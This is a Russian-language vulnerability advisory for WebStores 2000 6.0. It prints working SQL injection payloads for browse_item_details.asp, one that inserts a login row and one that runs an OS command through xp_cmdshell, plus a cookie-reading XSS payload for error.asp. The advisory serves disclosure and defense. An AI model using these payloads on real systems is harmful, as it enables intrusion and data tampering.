Security Lab

Множественные уязвимости в WebStores 2000

Дата публикации:23.02.2004
Всего просмотров:1630
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Webstores 2000 6.x
Уязвимые версии: Webstores 2000 6.0

Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в WebStores 2000. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционной системы на целевой системе. Удаленный пользователь может выполнить XSS нападение.

1. SQL инъекция в 'browse_item_details.asp':

Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%
27+AND+Store_Items.Sh
ow+%3C%3E+0+AND+Store_Item_Ke yword.Store_id%3D1000+and+Store_Items.Store_id%
3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_
d_1_name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d_3_name %2CStore_Items.U_d_4_name%
2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+
Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Item s.Item_Weight%
2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%
2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.S
pecial_start_date%2C+ Store_Items.Special_end_date+ORDER+BY+Count%
28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%2
8Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Sear ch_Store.x=0&Search_Store.y=0
и
 
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_ SKU=%25%
27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%
3D1000+and+Store_Items.Store_id%
3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1 _name%2C+
Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%
2C+Store_Item_Keyword.Item_Id%2CSt
ore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store _Items.Retail_Price%
2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Q
uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Pr 
ice_special_Discount%2C+Store_Items.Special_start_date%
2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Ite
m_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%
2 7dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4
1. XSS:
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>

URL производителя:http://www.webcortex.com/site2000/products.asp

Решение:Установите обновленную версию программы.

Ссылки: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities